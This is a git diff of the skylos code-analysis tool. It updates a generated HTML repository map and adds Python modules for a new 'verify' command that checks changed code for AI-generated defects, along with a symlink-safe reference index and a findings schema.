+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">scan_danger</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_shannon_entropy</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_query</a> <span>def</span></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/skylos/visitors/languages/java/danger.py" rel="noopener noreferrer">_get_text</a> <span>def</span></li></ul>
       </div>
     </div>
       </details>
@@ -1949,12 +1953,12 @@
     </article>
     
 
-    <article class="folder-card searchable" data-search="test unit and regression tests covering cli, analyzer, rules, integrations, and benchmarks. add narrow tests here before trusting analyzer or policy changes. test/ test/__init__.py test/conftest.py test/test_agent_center.py test/test_agent_integration.py test/test_agent_remediate.py test/test_agent_review_benchmark.py test/test_java_security.py test/test_verify_orchestrator.py test/test_debt.py test/test_cli_refactor_guardrails.py test/test_sync.py test/test_cli.py test/test_provenance.py test/test_cli_uncovered_paths.py">
+    <article class="folder-card searchable" data-search="test unit and regression tests covering cli, analyzer, rules, integrations, and benchmarks. add narrow tests here before trusting analyzer or policy changes. test/ test/__init__.py test/conftest.py test/test_agent_center.py test/test_agent_integration.py test/test_agent_remediate.py test/test_agent_review_benchmark.py test/test_java_security.py test/test_verify_orchestrator.py test/test_debt.py test/test_cli_refactor_guardrails.py test/test_sync.py test/test_dangerous.py test/test_cli.py test/test_provenance.py">
       <div class="card-head">
         <h3><a href="https://github.com/duriantaco/skylos/blob/main/test" rel="noopener noreferrer">test</a></h3>
         <div class="stat-row">
-          <span class="pill"><strong>files</strong> 194</span>
-          <span class="pill"><strong>symbols</strong> 2330</span>
+          <span class="pill"><strong>files</strong> 196</span>
+          <span class="pill"><strong>symbols</strong> 2393</span>
         </div>
       </div>
       <p>Unit and regression tests covering CLI, analyzer, rules, integrations, and benchmarks.</p>
@@ -1973,9 +1977,9 @@
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_debt.py" rel="noopener noreferrer">test/test_debt.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli_refactor_guardrails.py" rel="noopener noreferrer">test/test_cli_refactor_guardrails.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_sync.py" rel="noopener noreferrer">test/test_sync.py</a></li>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_dangerous.py" rel="noopener noreferrer">test/test_dangerous.py</a></li>
 <li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli.py" rel="noopener noreferrer">test/test_cli.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_provenance.py" rel="noopener noreferrer">test/test_provenance.py</a></li>
-<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_cli_uncovered_paths.py" rel="noopener noreferrer">test/test_cli_uncovered_paths.py</a></li></ul>
+<li><a href="https://github.com/duriantaco/skylos/blob/main/test/test_provenance.py" rel="noopener noreferrer">test/test_provenance.py</a></li></ul>
       </div>
       <div>
         <div class="mini-label">Key symbols</div>
@@ -2009,14 +2013,14 @@
         <tbody>
             <tr class="searchable" data-search="skylos/cli.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">skylos/cli.py</a></td>
-              <td>35 / 183</td>
+              <td>35 / 187</td>
               <td><span class="warn">many symbols</span> <span class="warn">shared path</span></td>
               <td>Root entrypoints and shared scan orchestration.</td>
             </tr>
 
             <tr class="searchable" data-search="skylos/config.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">skylos/config.py</a></td>
-              <td>6 / 26</td>
+              <td>8 / 30</td>
               <td><span class="warn">shared path</span></td>
               <td>Root entrypoints and shared scan orchestration.</td>
             </tr>
@@ -2072,7 +2076,7 @@
 
             <tr class="searchable" data-search="skylos/llm/security_taskflow.py llm security analysis, evidence grounding, provider runtime resolution, and prompt templates.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/llm/security_taskflow.py" rel="noopener noreferrer">skylos/llm/security_taskflow.py</a></td>
-              <td>11 / 58</td>
+              <td>11 / 62</td>
               <td><span class="warn">many symbols</span></td>
               <td>LLM security analysis, evidence grounding, provider runtime resolution, and prompt templates.</td>
             </tr>
@@ -6706,6 +6710,34 @@
               <td>skylos/cli.py</td>
             </tr>
 
+            <tr class="searchable" data-search="_add_agent_security_quick_args def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_add_agent_security_quick_args</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_add_agent_security_deep_args def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_add_agent_security_deep_args</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_security_deep_workflow_payload def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_security_deep_workflow_payload</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="_print_security_deep_workflow def skylos/cli.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_print_security_deep_workflow</a></td>
+              <td>def</td>
+              <td><span class="muted">private</span></td>
+              <td>skylos/cli.py</td>
+            </tr>
+
             <tr class="searchable" data-search="_explicit_prompt_templates_from_args def skylos/cli.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/cli.py" rel="noopener noreferrer">_explicit_prompt_templates_from_args</a></td>
               <td>def</td>
@@ -7259,8 +7291,22 @@
               <td>skylos/commands/whoami_cmd.py</td>
             </tr>
 
+            <tr class="searchable" data-search="configerror class skylos/config.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">ConfigError</a></td>
+              <td>class</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/config.py</td>
+            </tr>
+
             <tr class="searchable" data-search="load_config def skylos/config.py root entrypoints and shared scan orchestration.">
               <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">load_config</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/config.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="resolve_config_file_path def skylos/config.py root entrypoints and shared scan orchestration.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/config.py" rel="noopener noreferrer">resolve_config_file_path</a></td>
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/config.py</td>
@@ -7649,6 +7695,34 @@
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/core/result_cache.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="read_text_no_symlink def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">read_text_no_symlink</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="write_existing_text_no_symlink def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">write_existing_text_no_symlink</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="load_project_json_cache def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">load_project_json_cache</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
+            </tr>
+
+            <tr class="searchable" data-search="save_project_json_cache def skylos/core/safe_cache_io.py small shared core types and helpers used across scan paths.">
+              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/core/safe_cache_io.py" rel="noopener noreferrer">save_project_json_cache</a></td>
+              <td>def</td>
+              <td><span class="ok">public</span></td>
+              <td>skylos/core/safe_cache_io.py</td>
             </tr>
 
             <tr class="searchable" data-search="format_suite_table def skylos/core/suite.py small shared core types and helpers used across scan paths.">
@@ -8342,76 +8416,6 @@
               <td>def</td>
               <td><span class="ok">public</span></td>
               <td>skylos/discover/report.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="format_json def skylos/discover/report.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/report.py" rel="noopener noreferrer">format_json</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/report.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="taintflow class skylos/discover/taint.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/taint.py" rel="noopener noreferrer">TaintFlow</a></td>
-              <td>class</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/taint.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="analyze_taint_flows def skylos/discover/taint.py source discovery and language/workspace detection.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/discover/taint.py" rel="noopener noreferrer">analyze_taint_flows</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/discover/taint.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="build_go_engine_args def skylos/engines/go_contract.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_contract.py" rel="noopener noreferrer">build_go_engine_args</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_contract.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="validate_go_engine_output def skylos/engines/go_contract.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_contract.py" rel="noopener noreferrer">validate_go_engine_output</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_contract.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="goengineerror class skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">GoEngineError</a></td>
-              <td>class</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="discover_go_modules def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">discover_go_modules</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="resolve_go_engine_bin def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">resolve_go_engine_bin</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="run_go_engine_for_module def skylos/engines/go_runner.py language-specific engines and parsers beyond the python ast path.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/engines/go_runner.py" rel="noopener noreferrer">run_go_engine_for_module</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/engines/go_runner.py</td>
-            </tr>
-
-            <tr class="searchable" data-search="is_claude_security_report def skylos/integrations/ingest.py external-service integration helpers.">
-              <td><a href="https://github.com/duriantaco/skylos/blob/main/skylos/integrations/ingest.py" rel="noopener noreferrer">is_claude_security_report</a></td>
-              <td>def</td>
-              <td><span class="ok">public</span></td>
-              <td>skylos/integrations/ingest.py</td>
             </tr></tbody>
       </table>
     </section>

--- a/skylos/cli.py
+++ b/skylos/cli.py
@@ -2653,6 +2653,12 @@ def _run_sonar_command(argv):
     return run_sonar_command(argv, console_factory=Console)
 
 
+def _run_verify_command(argv):
+    from skylos.commands.verify_cmd import run_verify_command
+
+    return run_verify_command(argv)
+
+
 def _attach_upload_project_context(result: dict, project_root: pathlib.Path) -> None:
     try:
         from skylos.api import get_git_root as _get_git_root

--- a/skylos/cli_core/dispatch.py
+++ b/skylos/cli_core/dispatch.py
@@ -24,6 +24,7 @@ EARLY_COMMAND_HANDLERS = {
     "sonar": "_run_sonar_command",
     "city": "_run_removed_city_command",
     "suite": "run_suite_command",
+    "verify": "_run_verify_command",
     "discover": "_run_discover_command",
     "defend": "run_defend_command",
     "debt": "run_debt_command",
@@ -85,4 +86,3 @@ def dispatch_early_command(
         return run_early_command_help(argv[0], console_factory=console_factory)
 
     return namespace[handler_name](argv[1:])
-

--- a/skylos/commands/run_cmd.py
+++ b/skylos/commands/run_cmd.py
@@ -11,6 +11,13 @@ from skylos.config import load_config
 from skylos.constants import parse_exclude_folders
 
 
+DEPRECATION_WARNING = (
+    "[bold yellow]Warning:[/bold yellow] `skylos run` is deprecated and will be "
+    "removed in the next major release. Use [bold]skylos . -a[/bold] or "
+    "[bold]skylos suite .[/bold] for local analysis."
+)
+
+
 def _load_start_server() -> Callable[..., Any]:
     from skylos.web.server import start_server
 
@@ -25,6 +32,7 @@ def run_run_command(
     parse_exclude_folders_func: Callable[..., set[str] | tuple[str, ...]] = parse_exclude_folders,
     start_server_loader: Callable[[], Callable[..., Any]] = _load_start_server,
 ) -> None:
+    console = console_factory()
     run_exclude_folders: list[str] = []
     run_include_folders: list[str] = []
     run_port = None
@@ -45,11 +53,11 @@ def run_run_command(
             try:
                 run_port = int(argv[i + 1])
             except ValueError:
-                console_factory().print("[bold red]Error: --port must be an integer[/bold red]")
+                console.print("[bold red]Error: --port must be an integer[/bold red]")
                 raise SystemExit(1)
             i += 2
         elif argv[i] == "--port":
-            console_factory().print("[bold red]Error: --port requires a value[/bold red]")
+            console.print("[bold red]Error: --port requires a value[/bold red]")
             raise SystemExit(1)
         else:
             i += 1
@@ -59,11 +67,13 @@ def run_run_command(
         if run_port is not None:
             os.environ["SKYLOS_PORT"] = str(run_port)
 
+        console.print(DEPRECATION_WARNING)
+
         try:
             start_server = start_server_loader()
         except ImportError:
-            console_factory().print("[bold red]Error: Flask is required[/bold red]")
-            console_factory().print(
+            console.print("[bold red]Error: Flask is required[/bold red]")
+            console.print(
                 "[bold yellow]Install with: pip install flask flask-cors[/bold yellow]"
             )
             raise SystemExit(1)
@@ -77,13 +87,13 @@ def run_run_command(
 
         start_server(exclude_folders=list(exclude_folders))
     except ImportError:
-        console_factory().print("[bold red]Error: Flask is required[/bold red]")
-        console_factory().print(
+        console.print("[bold red]Error: Flask is required[/bold red]")
+        console.print(
             "[bold yellow]Install with: pip install flask flask-cors[/bold yellow]"
         )
         raise SystemExit(1)
     except ValueError as exc:
-        console_factory().print(f"[bold red]Error: {exc}[/bold red]")
+        console.print(f"[bold red]Error: {exc}[/bold red]")
         raise SystemExit(1)
     finally:
         if run_port is not None:

--- a/skylos/commands/verify_cmd.py
+++ b/skylos/commands/verify_cmd.py
@@ -1,0 +1,203 @@
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+from pathlib import Path
+from typing import Any, Sequence
+
+from skylos.constants import parse_exclude_folders
+from skylos.verify_change import verify_change_path, verify_change_stdin_payload
+
+
+def run_verify_command(
+    argv: Sequence[str],
+    *,
+    verify_change_path_func=verify_change_path,
+    verify_change_stdin_payload_func=verify_change_stdin_payload,
+    parse_exclude_folders_func=parse_exclude_folders,
+) -> int:
+    parser = _build_parser()
+    args = parser.parse_args(list(argv))
+    exclude_folders = _exclude_folders(args, parse_exclude_folders_func)
+
+    try:
+        payload = _run_from_args(
+            args,
+            parser,
+            exclude_folders,
+            verify_change_path_func,
+            verify_change_stdin_payload_func,
+        )
+    except ValueError as exc:
+        parser.error(str(exc))
+
+    _write_payload(payload, args.output)
+    return _exit_code(payload, no_fail=args.no_fail)
+
+
+def _build_parser() -> argparse.ArgumentParser:
+    parser = argparse.ArgumentParser(
+        prog="skylos verify",
+        description="Verify changed code for AI-code defects.",
+    )
+    _add_target_args(parser)
+    _add_scope_args(parser)
+    _add_runtime_args(parser)
+    _add_output_args(parser)
+    return parser
+
+
+def _add_target_args(parser: argparse.ArgumentParser) -> None:
+    parser.add_argument(
+        "path",
+        nargs="?",
+        default=".",
+        help="File or project path to verify.",
+    )
+    parser.add_argument(
+        "--file",
+        default=None,
+        help="File to verify when path is a project root.",
+    )
+
+
+def _add_scope_args(parser: argparse.ArgumentParser) -> None:
+    parser.add_argument(
+        "--stdin",
+        action="store_true",
+        help="Read a JSON manifest from stdin: {\"file\", \"code\", \"range\"?}.",
+    )
+    parser.add_argument(
+        "--range",
+        dest="line_range",
+        default=None,
+        metavar="L1:L2",
+        help="Only return findings overlapping this line range.",
+    )
+    parser.add_argument(
+        "--project-context",
+        action="store_true",
+        help="When --file is set, scan the project path and filter to that file.",
+    )
+
+
+def _add_runtime_args(parser: argparse.ArgumentParser) -> None:
+    parser.add_argument(
+        "--dependency-hallucinations",
+        action="store_true",
+        help="Include dependency hallucination checks that may use package metadata caches.",
+    )
+    parser.add_argument(
+        "--exclude-folder",
+        action="append",
+        dest="exclude_folders",
+        help="Exclude a folder from analysis. Can be used multiple times.",
+    )
+    parser.add_argument(
+        "--confidence",
+        "-c",
+        type=int,
+        default=60,
+        help="Analyzer confidence threshold. Default: 60.",
+    )
+
+
+def _add_output_args(parser: argparse.ArgumentParser) -> None:
+    parser.add_argument(
+        "--no-fail",
+        action="store_true",
+        help="Exit 0 even when AI-code findings are returned.",
+    )
+    parser.add_argument(
+        "--output",
+        "-o",
+        default=None,
+        help="Write JSON output to a file.",
+    )
+
+
+def _run_from_args(
+    args: argparse.Namespace,
+    parser: argparse.ArgumentParser,
+    exclude_folders: list[str],
+    verify_change_path_func,
+    verify_change_stdin_payload_func,
+) -> dict[str, Any]:
+    if args.stdin:
+        manifest = _read_stdin_manifest(parser)
+        _apply_stdin_overrides(args, manifest)
+        return verify_change_stdin_payload_func(
+            manifest,
+            confidence=args.confidence,
+            exclude_folders=exclude_folders,
+        )
+
+    return verify_change_path_func(
+        args.path,
+        file=args.file,
+        line_range=args.line_range,
+        confidence=args.confidence,
+        exclude_folders=exclude_folders,
+        project_context=args.project_context,
+        include_dependency_hallucinations=args.dependency_hallucinations,
+    )
+
+
+def _apply_stdin_overrides(args: argparse.Namespace, manifest: dict[str, Any]) -> None:
+    _set_default(manifest, "path", args.path)
+    if args.file is not None:
+        _set_default(manifest, "file", args.file)
+    if args.line_range is not None:
+        _set_default(manifest, "range", args.line_range)
+    if args.dependency_hallucinations:
+        _set_default(manifest, "include_dependency_hallucinations", True)
+
+
+def _set_default(payload: dict[str, Any], key: str, value: Any) -> None:
+    if key in payload:
+        return
+    payload[key] = value
+
+
+def _exclude_folders(args: argparse.Namespace, parse_exclude_folders_func) -> list[str]:
+    exclude_folders = list(parse_exclude_folders_func(use_defaults=True))
+    if args.exclude_folders is None:
+        return exclude_folders
+
+    for folder in args.exclude_folders:
+        exclude_folders.append(folder)
+    return exclude_folders
+
+
+def _write_payload(payload: dict[str, Any], output_path: str | None) -> None:
+    output = json.dumps(payload, indent=2)
+    if output_path:
+        Path(output_path).write_text(  # skylos: ignore[SKY-D215] user-selected CLI output path
+            output + "\n",
+            encoding="utf-8",
+        )
+        return
+
+    print(output)
+
+
+def _exit_code(payload: dict[str, Any], *, no_fail: bool) -> int:
+    if no_fail:
+        return 0
+    if payload.get("status") == "fail":
+        return 1
+    return 0
+
+
+def _read_stdin_manifest(parser: argparse.ArgumentParser) -> dict[str, Any]:
+    raw = sys.stdin.read()
+    if not raw.strip():
+        parser.error("--stdin requires a JSON manifest on stdin")
+    try:
+        manifest = json.loads(raw)
+    except json.JSONDecodeError as exc:
+        parser.error(f"--stdin manifest must be valid JSON: {exc.msg}")
+    if not isinstance(manifest, dict):
+        parser.error("--stdin manifest must be a JSON object")
+    return manifest

--- a/skylos/core/reference_index.py
+++ b/skylos/core/reference_index.py
@@ -1,0 +1,193 @@
+from __future__ import annotations
+
+import hashlib
+import os
+import stat
+import time
+from pathlib import Path
+from typing import Any
+
+
+INDEX_SCHEMA_VERSION = 1
+INDEX_KIND = "reference_graph"
+INDEX_CACHE_PATH = Path(".skylos") / "index" / "v1" / "reference_graph.json"
+MAX_INDEXED_SOURCE_BYTES = 10_000_000
+
+
+def build_empty_index(project_root: str | Path) -> dict[str, Any]:
+    root = _resolve_root(project_root)
+    return {
+        "schema_version": INDEX_SCHEMA_VERSION,
+        "index_kind": INDEX_KIND,
+        "generated_at": _utc_timestamp(),
+        "project_root": str(root),
+        "files": {},
+        "definitions": {},
+        "references": [],
+        "imports": {},
+        "reverse_dependencies": {},
+    }
+
+
+def build_index_payload(
+    project_root: str | Path,
+    *,
+    files: dict[str, dict[str, Any]] | None = None,
+    definitions: dict[str, Any] | None = None,
+    references: list[dict[str, Any]] | None = None,
+    imports: dict[str, Any] | None = None,
+    reverse_dependencies: dict[str, list[str]] | None = None,
+) -> dict[str, Any]:
+    payload = build_empty_index(project_root)
+    payload["files"] = _dict_copy(files)
+    payload["definitions"] = _dict_copy(definitions)
+    payload["references"] = _list_copy(references)
+    payload["imports"] = _dict_copy(imports)
+    payload["reverse_dependencies"] = _normalize_reverse_dependencies(
+        reverse_dependencies
+    )
+    return payload
+
+
+def file_signature(
+    project_root: str | Path,
+    file_path: str | Path,
+    *,
+    max_bytes: int = MAX_INDEXED_SOURCE_BYTES,
+) -> dict[str, Any] | None:
+    root = _resolve_root(project_root)
+    path = Path(file_path)
+    if not path.is_absolute():
+        path = root / path
+
+    try:
+        if path.is_symlink():
+            return None
+        stat_result = path.stat()
+    except OSError:
+        return None
+
+    if not stat.S_ISREG(stat_result.st_mode):
+        return None
+    if stat_result.st_size > max_bytes:
+        return None
+
+    digest = _sha256_file_no_symlink(path, max_bytes=max_bytes)
+    if digest is None:
+        return None
+
+    try:
+        relpath = path.resolve().relative_to(root).as_posix()
+    except (OSError, ValueError):
+        return None
+
+    return {
+        "path": relpath,
+        "sha256": digest,
+        "size": int(stat_result.st_size),
+        "mtime_ns": int(stat_result.st_mtime_ns),
+    }
+
+
+def validate_index_payload(payload: dict[str, Any]) -> bool:
+    if not isinstance(payload, dict):
+        return False
+    if payload.get("schema_version") != INDEX_SCHEMA_VERSION:
+        return False
+    if payload.get("index_kind") != INDEX_KIND:
+        return False
+    required = {
+        "generated_at",
+        "project_root",
+        "files",
+        "definitions",
+        "references",
+        "imports",
+        "reverse_dependencies",
+    }
+    if not required.issubset(payload):
+        return False
+    if not isinstance(payload["files"], dict):
+        return False
+    if not isinstance(payload["definitions"], dict):
+        return False
+    if not isinstance(payload["references"], list):
+        return False
+    if not isinstance(payload["imports"], dict):
+        return False
+    if not isinstance(payload["reverse_dependencies"], dict):
+        return False
+    return True
+
+
+def _sha256_file_no_symlink(path: Path, *, max_bytes: int) -> str | None:
+    flags = os.O_RDONLY
+    if hasattr(os, "O_NOFOLLOW"):
+        flags |= os.O_NOFOLLOW
+
+    fd: int | None = None
+    try:
+        fd = os.open(path, flags)  # skylos: ignore[SKY-D215] guarded index source path
+        stat_result = os.fstat(fd)
+        if not stat.S_ISREG(stat_result.st_mode):
+            return None
+        if stat_result.st_size > max_bytes:
+            return None
+
+        digest = hashlib.sha256()
+        remaining = max_bytes + 1
+        while remaining > 0:
+            chunk = os.read(fd, min(1024 * 1024, remaining))
+            if not chunk:
+                break
+            digest.update(chunk)
+            remaining -= len(chunk)
+        if remaining <= 0:
+            return None
+        return digest.hexdigest()
+    except OSError:
+        return None
+    finally:
+        if fd is not None:
+            try:
+                os.close(fd)
+            except OSError:
+                pass
+
+
+def _resolve_root(project_root: str | Path) -> Path:
+    try:
+        return Path(project_root).resolve()
+    except OSError:
+        return Path(project_root)
+
+
+def _utc_timestamp() -> str:
+    return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
+
+
+def _dict_copy(value: dict[str, Any] | None) -> dict[str, Any]:
+    if value is None:
+        return {}
+    return dict(value)
+
+
+def _list_copy(value: list[dict[str, Any]] | None) -> list[dict[str, Any]]:
+    if value is None:
+        return []
+    return list(value)
+
+
+def _normalize_reverse_dependencies(
+    reverse_dependencies: dict[str, list[str]] | None,
+) -> dict[str, list[str]]:
+    if reverse_dependencies is None:
+        return {}
+
+    normalized: dict[str, list[str]] = {}
+    for path, dependencies in reverse_dependencies.items():
+        unique_dependencies = set()
+        for dependency in dependencies:
+            unique_dependencies.add(str(dependency))
+        normalized[str(path)] = sorted(unique_dependencies)
+    return normalized

--- a/skylos/core/verify_change_schema.py
+++ b/skylos/core/verify_change_schema.py
@@ -1,0 +1,412 @@
+from __future__ import annotations
+
+from collections.abc import Iterator
+from pathlib import Path
+from typing import Any
+
+
+SCHEMA_VERSION = 1
+
+AI_VIBE_CATEGORIES = {
+    "hallucinated_reference",
+    "incomplete_generation",
+    "ghost_config",
+    "stale_reference",
+    "missing_resilience_control",
+}
+
+AI_RULE_DEFAULTS = {
+    "SKY-L011": ("disabled_security_control", "medium"),
+    "SKY-D222": ("dependency_hallucination", "high"),
+    "SKY-D223": ("dependency_hallucination", "medium"),
+}
+
+FINDING_SECTIONS = (
+    ("quality", "quality"),
+    ("danger", "security"),
+    ("custom_rules", "custom"),
+)
+
+SUGGESTED_FIX_BY_VIBE = {
+    "hallucinated_reference": (
+        "Define or import the referenced symbol, or replace it with an existing helper."
+    ),
+    "incomplete_generation": "Implement the stub or remove the unfinished code path.",
+    "ghost_config": "Define the referenced config value or remove the stale flag check.",
+    "stale_reference": "Update the reference to the renamed symbol or remove it.",
+    "missing_resilience_control": "Add the missing timeout or resilience control.",
+    "disabled_security_control": "Re-enable the security control or remove the bypass.",
+    "dependency_hallucination": (
+        "Remove the hallucinated dependency or replace it with a real package."
+    ),
+}
+
+
+def parse_line_range(value: str | None) -> tuple[int, int] | None:
+    if value is None:
+        return None
+
+    raw = str(value).strip()
+    if not raw:
+        return None
+
+    separator = _line_range_separator(raw)
+    if separator is None:
+        start = int(raw)
+        end = int(raw)
+    else:
+        left, right = raw.split(separator, 1)
+        start = int(left.strip())
+        end = int(right.strip())
+
+    _validate_line_range(start, end)
+    return start, end
+
+
+def build_verify_change_response(
+    analysis_result: dict[str, Any],
+    *,
+    project_root: str | Path,
+    target_file: str | Path | None = None,
+    line_range: str | tuple[int, int] | None = None,
+    scan_target: str | Path | None = None,
+) -> dict[str, Any]:
+    root = _project_root(project_root)
+    parsed_range = _coerce_line_range(line_range)
+    findings: list[dict[str, Any]] = []
+
+    for finding, category in _iter_ai_findings(analysis_result):
+        if not _matches_target(finding, root, target_file):
+            continue
+        if not _matches_line_range(finding, parsed_range):
+            continue
+
+        normalized = _normalize_finding(finding, category, root)
+        findings.append(normalized)
+
+    findings.sort(
+        key=lambda item: (
+            _likelihood_sort(item["ai_likelihood"]),
+            item["range"]["file"],
+            item["range"]["start_line"],
+            item["rule_id"],
+        )
+    )
+
+    return {
+        "schema_version": SCHEMA_VERSION,
+        "tool": "verify_change",
+        "status": _status_for_findings(findings),
+        "target": {
+            "path": _target_path_for_payload(scan_target, target_file, project_root),
+            "file": _target_file_for_payload(target_file, root),
+            "range": _range_for_payload(parsed_range),
+        },
+        "findings": findings,
+        "summary": _summary(findings),
+    }
+
+
+def _iter_ai_findings(
+    analysis_result: dict[str, Any],
+) -> Iterator[tuple[dict[str, Any], str]]:
+    for section, category in FINDING_SECTIONS:
+        for finding in _section_findings(analysis_result, section):
+            if _is_ai_finding(finding):
+                yield finding, category
+
+
+def _is_ai_finding(finding: dict[str, Any]) -> bool:
+    vibe = str(_finding_value(finding, ("vibe_category",), "")).strip()
+    if vibe in AI_VIBE_CATEGORIES:
+        return True
+
+    rule_id = str(_finding_value(finding, ("rule_id", "rule"), ""))
+    return rule_id in AI_RULE_DEFAULTS
+
+
+def _normalize_finding(
+    finding: dict[str, Any],
+    category: str,
+    root: Path,
+) -> dict[str, Any]:
+    rule_id = str(_finding_value(finding, ("rule_id", "rule"), "UNKNOWN"))
+    default_vibe, default_likelihood = _rule_defaults(rule_id)
+    vibe_category = str(_finding_value(finding, ("vibe_category",), default_vibe))
+    ai_likelihood = str(
+        _finding_value(finding, ("ai_likelihood",), default_likelihood)
+    )
+    confidence = _confidence(finding.get("confidence"), ai_likelihood)
+    severity = str(_finding_value(finding, ("severity",), "MEDIUM")).upper()
+
+    return {
+        "rule_id": rule_id,
+        "vibe_category": vibe_category,
+        "ai_likelihood": ai_likelihood,
+        "range": _finding_range(finding, root),
+        "message": _message(finding),
+        "suggested_fix": _suggested_fix(finding, vibe_category),
+        "confidence": confidence,
+        "severity": severity,
+        "category": category,
+    }
+
+
